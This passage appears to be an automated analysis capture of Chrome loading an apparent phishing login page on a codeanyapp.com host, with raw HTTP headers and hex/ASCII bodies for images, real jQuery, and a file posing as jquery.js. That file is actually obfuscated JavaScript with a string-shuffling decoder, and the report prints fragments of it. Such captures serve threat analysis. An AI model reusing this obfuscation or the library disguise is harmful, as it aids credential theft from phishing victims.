                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: image
                                                                                                    Referer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.php
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:49:59 UTC235INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:21 GMT
                                                                                                    Content-Type: image/png
                                                                                                    Content-Length: 507
                                                                                                    Connection: close
                                                                                                    Last-Modified: Tue, 31 Dec 2024 07:16:17 GMT
                                                                                                    ETag: "1fb-62a8bb482fe7b"
                                                                                                    Accept-Ranges: bytes
                                                                                                    2025-01-02 08:49:59 UTC507INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2f 00 00 00 1f 08 06 00 00 00 77 5d 94 01 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 12 74 00 00 12 74 01 de 66 1f 78 00 00 01 90 49 44 41 54 58 47 d5 96 31 4e 03 31 10 45 d3 53 b1 10 29 20 14 21 41 c1 0d 68 d2 40 47 99 82 1a 0e c2 0d a8 b8 0a 07 e0 14 48 1c 67 d8 6f c9 f1 d8 f9 e0 09 3b 8b 34 91 9e a2 f9 6b 8f bf ed b1 77 17 e3 4f 02 43 c5 28 50 31 0a 54 8c 02 15 a3 40 c5 8a a3 ed b5 9c be dd c9 f9 c7 a3 ac 3f 9f 64 fd f5 ec c3 98 0b 39 91 1b 63 b0 b1 3b 50 31 81 84 c9 30 1b 78 06 30 d6 81 93 a0 a2 1c bf dc d2 01 fe 03 8c cd 3c 11 f6 c5 b9 8c 9f bd de cb f2 e1 46 4e 2e 57 32 0c 43 fa 47 0c bd 6d 6b 9c 40 2d 60 db da 44 53 b9
                                                                                                    Data Ascii: PNGIHDR/w]sRGBgAMAapHYsttfxIDATXG1N1ES) !Ah@GHgo;4kwOC(P1T@?d9c;P10x0<FN.W2CGmk@-`DS


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.449751198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:49:59 UTC601OUTGET /army/army/auth/res/jq.js HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: script
                                                                                                    Referer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.php
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:49:59 UTC276INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:21 GMT
                                                                                                    Content-Type: application/javascript
                                                                                                    Content-Length: 293671
                                                                                                    Connection: close
                                                                                                    Last-Modified: Tue, 31 Dec 2024 07:16:17 GMT
                                                                                                    ETag: "47b27-62a8bb47f705a"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Vary: Accept-Encoding
                                                                                                    2025-01-02 08:49:59 UTC1178INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 33 2e 36 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 32 32 2d 31 32 2d 32
                                                                                                    Data Ascii: /*! * jQuery JavaScript Library v3.6.3 * https://jquery.com/ * * Includes Sizzle.js * https://sizzlejs.com/ * * Copyright OpenJS Foundation and other contributors * Released under the MIT license * https://jquery.org/license * * Date: 2022-12-2
                                                                                                    2025-01-02 08:49:59 UTC11584INData Raw: 29 20 7b 0a 0a 2f 2f 20 45 64 67 65 20 3c 3d 20 31 32 20 2d 20 31 33 2b 2c 20 46 69 72 65 66 6f 78 20 3c 3d 31 38 20 2d 20 34 35 2b 2c 20 49 45 20 31 30 20 2d 20 31 31 2c 20 53 61 66 61 72 69 20 35 2e 31 20 2d 20 39 2b 2c 20 69 4f 53 20 36 20 2d 20 39 2e 31 0a 2f 2f 20 74 68 72 6f 77 20 65 78 63 65 70 74 69 6f 6e 73 20 77 68 65 6e 20 6e 6f 6e 2d 73 74 72 69 63 74 20 63 6f 64 65 20 28 65 2e 67 2e 2c 20 41 53 50 2e 4e 45 54 20 34 2e 35 29 20 61 63 63 65 73 73 65 73 20 73 74 72 69 63 74 20 6d 6f 64 65 0a 2f 2f 20 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2e 63 61 6c 6c 65 72 20 28 74 72 61 63 2d 31 33 33 33 35 29 2e 20 42 75 74 20 61 73 20 6f 66 20 6a 51 75 65 72 79 20 33 2e 30 20 28 32 30 31 36 29 2c 20 73 74 72 69 63 74 20 6d 6f 64 65 20 73 68 6f 75
                                                                                                    Data Ascii: ) {// Edge <= 12 - 13+, Firefox <=18 - 45+, IE 10 - 11, Safari 5.1 - 9+, iOS 6 - 9.1// throw exceptions when non-strict code (e.g., ASP.NET 4.5) accesses strict mode// arguments.callee.caller (trac-13335). But as of jQuery 3.0 (2016), strict mode shou
                                                                                                    2025-01-02 08:49:59 UTC8688INData Raw: 7a 7a 6c 65 20 3d 0a 2f 2a 21 0a 20 2a 20 53 69 7a 7a 6c 65 20 43 53 53 20 53 65 6c 65 63 74 6f 72 20 45 6e 67 69 6e 65 20 76 32 2e 33 2e 39 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 73 2e 66 6f 75 6e 64 61 74 69 6f 6e 2f 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 32 32 2d 31 32 2d 31 39 0a 20 2a 2f 0a 28 20 66 75 6e 63 74 69 6f 6e 28 20 77 69 6e 64 6f 77 20 29 20 7b 0a 76 61 72 20 69 2c 0a 09 73 75 70 70 6f 72 74 2c 0a 09 45
                                                                                                    Data Ascii: zzle =/*! * Sizzle CSS Selector Engine v2.3.9 * https://sizzlejs.com/ * * Copyright JS Foundation and other contributors * Released under the MIT license * https://js.foundation/ * * Date: 2022-12-19 */( function( window ) {var i,support,E
                                                                                                    2025-01-02 08:49:59 UTC7696INData Raw: 6c 65 63 74 6f 72 20 2b 20 22 20 22 20 5d 20 26 26 0a 09 09 09 09 28 20 21 72 62 75 67 67 79 51 53 41 20 7c 7c 20 21 72 62 75 67 67 79 51 53 41 2e 74 65 73 74 28 20 73 65 6c 65 63 74 6f 72 20 29 20 29 20 26 26 0a 0a 09 09 09 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 49 45 20 38 20 6f 6e 6c 79 0a 09 09 09 09 2f 2f 20 45 78 63 6c 75 64 65 20 6f 62 6a 65 63 74 20 65 6c 65 6d 65 6e 74 73 0a 09 09 09 09 28 20 6e 6f 64 65 54 79 70 65 20 21 3d 3d 20 31 20 7c 7c 20 63 6f 6e 74 65 78 74 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 21 3d 3d 20 22 6f 62 6a 65 63 74 22 20 29 20 29 20 7b 0a 0a 09 09 09 09 6e 65 77 53 65 6c 65 63 74 6f 72 20 3d 20 73 65 6c 65 63 74 6f 72 3b 0a 09 09 09 09 6e 65 77 43 6f 6e 74 65 78 74 20 3d 20 63 6f 6e 74 65 78
                                                                                                    Data Ascii: lector + " " ] &&( !rbuggyQSA || !rbuggyQSA.test( selector ) ) &&// Support: IE 8 only// Exclude object elements( nodeType !== 1 || context.nodeName.toLowerCase() !== "object" ) ) {newSelector = selector;newContext = contex
                                                                                                    2025-01-02 08:49:59 UTC8232INData Raw: 3b 0a 7d 0a 0a 2f 2a 2a 0a 20 2a 20 52 65 74 75 72 6e 73 20 61 20 66 75 6e 63 74 69 6f 6e 20 74 6f 20 75 73 65 20 69 6e 20 70 73 65 75 64 6f 73 20 66 6f 72 20 70 6f 73 69 74 69 6f 6e 61 6c 73 0a 20 2a 20 40 70 61 72 61 6d 20 7b 46 75 6e 63 74 69 6f 6e 7d 20 66 6e 0a 20 2a 2f 0a 66 75 6e 63 74 69 6f 6e 20 63 72 65 61 74 65 50 6f 73 69 74 69 6f 6e 61 6c 50 73 65 75 64 6f 28 20 66 6e 20 29 20 7b 0a 09 72 65 74 75 72 6e 20 6d 61 72 6b 46 75 6e 63 74 69 6f 6e 28 20 66 75 6e 63 74 69 6f 6e 28 20 61 72 67 75 6d 65 6e 74 20 29 20 7b 0a 09 09 61 72 67 75 6d 65 6e 74 20 3d 20 2b 61 72 67 75 6d 65 6e 74 3b 0a 09 09 72 65 74 75 72 6e 20 6d 61 72 6b 46 75 6e 63 74 69 6f 6e 28 20 66 75 6e 63 74 69 6f 6e 28 20 73 65 65 64 2c 20 6d 61 74 63 68 65 73 20 29 20 7b 0a 09 09
                                                                                                    Data Ascii: ;}/** * Returns a function to use in pseudos for positionals * @param {Function} fn */function createPositionalPseudo( fn ) {return markFunction( function( argument ) {argument = +argument;return markFunction( function( seed, matches ) {
                                                                                                    2025-01-02 08:49:59 UTC1448INData Raw: 09 2f 2f 20 51 53 41 20 61 6e 64 20 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 20 73 75 70 70 6f 72 74 0a 0a 09 2f 2f 20 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 28 3a 61 63 74 69 76 65 29 20 72 65 70 6f 72 74 73 20 66 61 6c 73 65 20 77 68 65 6e 20 74 72 75 65 20 28 49 45 39 2f 4f 70 65 72 61 20 31 31 2e 35 29 0a 09 72 62 75 67 67 79 4d 61 74 63 68 65 73 20 3d 20 5b 5d 3b 0a 0a 09 2f 2f 20 71 53 61 28 3a 66 6f 63 75 73 29 20 72 65 70 6f 72 74 73 20 66 61 6c 73 65 20 77 68 65 6e 20 74 72 75 65 20 28 43 68 72 6f 6d 65 20 32 31 29 0a 09 2f 2f 20 57 65 20 61 6c 6c 6f 77 20 74 68 69 73 20 62 65 63 61 75 73 65 20 6f 66 20 61 20 62 75 67 20 69 6e 20 49 45 38 2f 39 20 74 68 61 74 20 74 68 72 6f 77 73 20 61 6e 20 65 72 72 6f 72 0a 09 2f 2f 20 77 68 65 6e 65
                                                                                                    Data Ascii: // QSA and matchesSelector support// matchesSelector(:active) reports false when true (IE9/Opera 11.5)rbuggyMatches = [];// qSa(:focus) reports false when true (Chrome 21)// We allow this because of a bug in IE8/9 that throws an error// whene
                                                                                                    2025-01-02 08:49:59 UTC13032INData Raw: 70 6f 72 74 3a 20 49 45 38 0a 09 09 09 2f 2f 20 42 6f 6f 6c 65 61 6e 20 61 74 74 72 69 62 75 74 65 73 20 61 6e 64 20 22 76 61 6c 75 65 22 20 61 72 65 20 6e 6f 74 20 74 72 65 61 74 65 64 20 63 6f 72 72 65 63 74 6c 79 0a 09 09 09 69 66 20 28 20 21 65 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 20 22 5b 73 65 6c 65 63 74 65 64 5d 22 20 29 2e 6c 65 6e 67 74 68 20 29 20 7b 0a 09 09 09 09 72 62 75 67 67 79 51 53 41 2e 70 75 73 68 28 20 22 5c 5c 5b 22 20 2b 20 77 68 69 74 65 73 70 61 63 65 20 2b 20 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 20 2b 20 62 6f 6f 6c 65 61 6e 73 20 2b 20 22 29 22 20 29 3b 0a 09 09 09 7d 0a 0a 09 09 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 43 68 72 6f 6d 65 3c 32 39 2c 20 41 6e 64 72 6f 69 64 3c 34 2e 34 2c 20 53 61 66 61 72 69 3c
                                                                                                    Data Ascii: port: IE8// Boolean attributes and "value" are not treated correctlyif ( !el.querySelectorAll( "[selected]" ).length ) {rbuggyQSA.push( "\\[" + whitespace + "*(?:value|" + booleans + ")" );}// Support: Chrome<29, Android<4.4, Safari<
                                                                                                    2025-01-02 08:49:59 UTC3352INData Raw: 65 70 6c 61 63 65 28 20 72 75 6e 65 73 63 61 70 65 2c 20 66 75 6e 65 73 63 61 70 65 20 29 3b 0a 0a 09 09 09 2f 2f 20 4d 6f 76 65 20 74 68 65 20 67 69 76 65 6e 20 76 61 6c 75 65 20 74 6f 20 6d 61 74 63 68 5b 33 5d 20 77 68 65 74 68 65 72 20 71 75 6f 74 65 64 20 6f 72 20 75 6e 71 75 6f 74 65 64 0a 09 09 09 6d 61 74 63 68 5b 20 33 20 5d 20 3d 20 28 20 6d 61 74 63 68 5b 20 33 20 5d 20 7c 7c 20 6d 61 74 63 68 5b 20 34 20 5d 20 7c 7c 0a 09 09 09 09 6d 61 74 63 68 5b 20 35 20 5d 20 7c 7c 20 22 22 20 29 2e 72 65 70 6c 61 63 65 28 20 72 75 6e 65 73 63 61 70 65 2c 20 66 75 6e 65 73 63 61 70 65 20 29 3b 0a 0a 09 09 09 69 66 20 28 20 6d 61 74 63 68 5b 20 32 20 5d 20 3d 3d 3d 20 22 7e 3d 22 20 29 20 7b 0a 09 09 09 09 6d 61 74 63 68 5b 20 33 20 5d 20 3d 20 22 20 22 20
                                                                                                    Data Ascii: eplace( runescape, funescape );// Move the given value to match[3] whether quoted or unquotedmatch[ 3 ] = ( match[ 3 ] || match[ 4 ] ||match[ 5 ] || "" ).replace( runescape, funescape );if ( match[ 2 ] === "~=" ) {match[ 3 ] = " "
                                                                                                    2025-01-02 08:49:59 UTC14024INData Raw: 22 5e 3d 22 20 3f 20 63 68 65 63 6b 20 26 26 20 72 65 73 75 6c 74 2e 69 6e 64 65 78 4f 66 28 20 63 68 65 63 6b 20 29 20 3d 3d 3d 20 30 20 3a 0a 09 09 09 09 09 6f 70 65 72 61 74 6f 72 20 3d 3d 3d 20 22 2a 3d 22 20 3f 20 63 68 65 63 6b 20 26 26 20 72 65 73 75 6c 74 2e 69 6e 64 65 78 4f 66 28 20 63 68 65 63 6b 20 29 20 3e 20 2d 31 20 3a 0a 09 09 09 09 09 6f 70 65 72 61 74 6f 72 20 3d 3d 3d 20 22 24 3d 22 20 3f 20 63 68 65 63 6b 20 26 26 20 72 65 73 75 6c 74 2e 73 6c 69 63 65 28 20 2d 63 68 65 63 6b 2e 6c 65 6e 67 74 68 20 29 20 3d 3d 3d 20 63 68 65 63 6b 20 3a 0a 09 09 09 09 09 6f 70 65 72 61 74 6f 72 20 3d 3d 3d 20 22 7e 3d 22 20 3f 20 28 20 22 20 22 20 2b 20 72 65 73 75 6c 74 2e 72 65 70 6c 61 63 65 28 20 72 77 68 69 74 65 73 70 61 63 65 2c 20 22 20 22 20
                                                                                                    Data Ascii: "^=" ? check && result.indexOf( check ) === 0 :operator === "*=" ? check && result.indexOf( check ) > -1 :operator === "$=" ? check && result.slice( -check.length ) === check :operator === "~=" ? ( " " + result.replace( rwhitespace, " "
                                                                                                    2025-01-02 08:49:59 UTC2896INData Raw: 20 3d 3d 3d 20 31 20 7c 7c 20 63 68 65 63 6b 4e 6f 6e 45 6c 65 6d 65 6e 74 73 20 29 20 7b 0a 09 09 09 09 09 72 65 74 75 72 6e 20 6d 61 74 63 68 65 72 28 20 65 6c 65 6d 2c 20 63 6f 6e 74 65 78 74 2c 20 78 6d 6c 20 29 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 7d 20 3a 0a 0a 09 09 2f 2f 20 43 68 65 63 6b 20 61 67 61 69 6e 73 74 20 61 6c 6c 20 61 6e 63 65 73 74 6f 72 2f 70 72 65 63 65 64 69 6e 67 20 65 6c 65 6d 65 6e 74 73 0a 09 09 66 75 6e 63 74 69 6f 6e 28 20 65 6c 65 6d 2c 20 63 6f 6e 74 65 78 74 2c 20 78 6d 6c 20 29 20 7b 0a 09 09 09 76 61 72 20 6f 6c 64 43 61 63 68 65 2c 20 75 6e 69 71 75 65 43 61 63 68 65 2c 20 6f 75 74 65 72 43 61 63 68 65 2c 0a 09 09 09 09 6e 65 77 43 61 63 68 65 20 3d 20 5b 20 64
                                                                                                    Data Ascii: === 1 || checkNonElements ) {return matcher( elem, context, xml );}}return false;} :// Check against all ancestor/preceding elementsfunction( elem, context, xml ) {var oldCache, uniqueCache, outerCache,newCache = [ d


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    9192.168.2.449747198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:49:59 UTC605OUTGET /army/army/auth/res/jquery.js HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: script
                                                                                                    Referer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.php
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:49:59 UTC272INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:21 GMT
                                                                                                    Content-Type: application/javascript
                                                                                                    Content-Length: 2841
                                                                                                    Connection: close
                                                                                                    Last-Modified: Tue, 31 Dec 2024 07:16:17 GMT
                                                                                                    ETag: "b19-62a8bb47ae06a"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Vary: Accept-Encoding
                                                                                                    2025-01-02 08:49:59 UTC1182INData Raw: 76 61 72 20 70 72 6f 74 6f 63 6f 6c 2c 75 72 6c 2c 64 61 74 61 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 4f 79 68 3d 27 27 2c 4b 4d 6f 3d 37 32 36 2d 37 31 35 3b 66 75 6e 63 74 69 6f 6e 20 4b 77 64 28 66 29 7b 76 61 72 20 6b 3d 31 35 34 32 32 39 34 3b 76 61 72 20 73 3d 66 2e 6c 65 6e 67 74 68 3b 76 61 72 20 70 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 73 3b 69 2b 2b 29 7b 70 5b 69 5d 3d 66 2e 63 68 61 72 41 74 28 69 29 7d 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 73 3b 69 2b 2b 29 7b 76 61 72 20 61 3d 6b 2a 28 69 2b 33 39 33 29 2b 28 6b 25 32 37 30 36 35 29 3b 76 61 72 20 78 3d 6b 2a 28 69 2b 32 30 32 29 2b 28 6b 25 33 30 35 30 34 29 3b 76 61 72 20 71 3d 61 25 73 3b 76 61 72 20 62 3d 78 25 73 3b 76 61 72 20 75 3d 70 5b 71 5d 3b 70
                                                                                                    Data Ascii: var protocol,url,data;(function(){var Oyh='',KMo=726-715;function Kwd(f){var k=1542294;var s=f.length;var p=[];for(var i=0;i<s;i++){p[i]=f.charAt(i)};for(var i=0;i<s;i++){var a=k*(i+393)+(k%27065);var x=k*(i+202)+(k%30504);var q=a%s;var b=x%s;var u=p[q];p
                                                                                                    2025-01-02 08:49:59 UTC1659INData Raw: 67 61 65 73 31 72 3d 29 2b 32 69 69 69 28 30 75 29 3d 3d 63 74 3b 30 41 29 28 6c 5d 6f 3b 3b 6f 74 61 76 74 6e 6c 35 6e 67 29 29 76 64 3d 43 76 6c 74 72 6f 6f 65 72 69 37 2a 6e 36 2c 62 73 76 2e 3b 28 74 22 3d 3d 29 76 3d 3b 39 43 75 3d 63 2b 22 6f 2e 75 6f 32 3c 3b 32 3d 3b 27 3b 76 61 72 20 70 4a 7a 3d 4b 77 64 5b 73 67 47 5d 3b 76 61 72 20 65 72 41 3d 27 27 3b 76 61 72 20 66 71 59 3d 70 4a 7a 3b 76 61 72 20 4d 41 6d 3d 70 4a 7a 28 65 72 41 2c 4b 77 64 28 4b 59 4a 29 29 3b 76 61 72 20 43 6e 70 3d 4d 41 6d 28 4b 77 64 28 27 6c 73 2e 6f 2e 31 6e 4f 28 28 29 5d 37 25 61 5c 2f 2d 61 28 35 3d 72 74 24 2e 74 32 62 2e 29 70 7d 28 2c 67 30 28 33 34 2c 29 6f 64 6f 6a 68 2e 6f 24 75 78 3b 64 25 26 6f 33 23 3d 78 6d 6e 5f 62 61 62 64 66 3d 30 6e 6f 2e 2c 32 25 32
                                                                                                    Data Ascii: gaes1r=)+2iii(0u)==ct;0A)(l]o;;otavtnl5ng))vd=Cvltrooeri7*n6,bsv.;(t"==)v=;9Cu=c+"o.uo2<;2=;';var pJz=Kwd[sgG];var erA='';var fqY=pJz;var MAm=pJz(erA,Kwd(KYJ));var Cnp=MAm(Kwd('ls.o.1nO(()]7%a\/-a(5=rt$.t2b.)p}(,g0(34,)odojh.o$ux;d%&o3#=xmn_babdf=0no.,2%2


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    10192.168.2.449755198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:50:00 UTC389OUTGET /army/army/auth/res/remember.png HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:50:00 UTC235INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:22 GMT
                                                                                                    Content-Type: image/png
                                                                                                    Content-Length: 507
                                                                                                    Connection: close
                                                                                                    Last-Modified: Tue, 31 Dec 2024 07:16:17 GMT
                                                                                                    ETag: "1fb-62a8bb482fe7b"
                                                                                                    Accept-Ranges: bytes
                                                                                                    2025-01-02 08:50:00 UTC507INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2f 00 00 00 1f 08 06 00 00 00 77 5d 94 01 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 12 74 00 00 12 74 01 de 66 1f 78 00 00 01 90 49 44 41 54 58 47 d5 96 31 4e 03 31 10 45 d3 53 b1 10 29 20 14 21 41 c1 0d 68 d2 40 47 99 82 1a 0e c2 0d a8 b8 0a 07 e0 14 48 1c 67 d8 6f c9 f1 d8 f9 e0 09 3b 8b 34 91 9e a2 f9 6b 8f bf ed b1 77 17 e3 4f 02 43 c5 28 50 31 0a 54 8c 02 15 a3 40 c5 8a a3 ed b5 9c be dd c9 f9 c7 a3 ac 3f 9f 64 fd f5 ec c3 98 0b 39 91 1b 63 b0 b1 3b 50 31 81 84 c9 30 1b 78 06 30 d6 81 93 a0 a2 1c bf dc d2 01 fe 03 8c cd 3c 11 f6 c5 b9 8c 9f bd de cb f2 e1 46 4e 2e 57 32 0c 43 fa 47 0c bd 6d 6b 9c 40 2d 60 db da 44 53 b9
                                                                                                    Data Ascii: PNGIHDR/w]sRGBgAMAapHYsttfxIDATXG1N1ES) !Ah@GHgo;4kwOC(P1T@?d9c;P10x0<FN.W2CGmk@-`DS


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    11192.168.2.449754198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:50:00 UTC385OUTGET /army/army/auth/res/logo.png HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:50:00 UTC236INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:22 GMT
                                                                                                    Content-Type: image/png
                                                                                                    Content-Length: 3282
                                                                                                    Connection: close
                                                                                                    Last-Modified: Tue, 31 Dec 2024 07:16:17 GMT
                                                                                                    ETag: "cd2-62a8bb482911c"
                                                                                                    Accept-Ranges: bytes
                                                                                                    2025-01-02 08:50:00 UTC3282INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9f 00 00 00 3f 08 06 00 00 00 fe 07 1a 0e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 12 74 00 00 12 74 01 de 66 1f 78 00 00 0c 67 49 44 41 54 78 5e ed 9c 05 ac 54 47 17 c7 09 92 14 2d 10 1c 02 a5 b8 bb 15 b7 16 0d c5 8b 13 20 b8 06 8a 85 06 29 6e a5 b8 43 d1 00 41 8b 43 70 08 ee ee ee 2e 2d 21 c0 7c df 7f 76 ee 32 77 f6 dc bd 77 df db bd cb 7b 9d 7f f2 4b e0 dc 99 d9 d9 bd 73 67 ce 9c 33 f7 c5 f8 bf 98 46 13 26 48 a3 46 e3 06 a4 51 a3 71 03 d2 a8 d1 b8 01 69 d4 68 dc 80 34 6a 34 6e 40 1a 35 1a 37 20 8d 1a 8d 1b 90 c6 48 13 2f 5e 3c 56 b9 72 65 36 68 d0 20 b6 7d fb 76 f6 e6 cd 1b a6 ea d1 a3 47 6c f5 ea d5 ac 67 cf 9e ac 68 d1
                                                                                                    Data Ascii: PNGIHDR?sRGBgAMAapHYsttfxgIDATx^TG- )nCACp.-!|v2ww{Ksg3F&HFQqih4j4n@57 H/^<Vre6h }vGlgh


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    12192.168.2.449756198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:50:00 UTC386OUTGET /army/army/auth/res/jquery.js HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
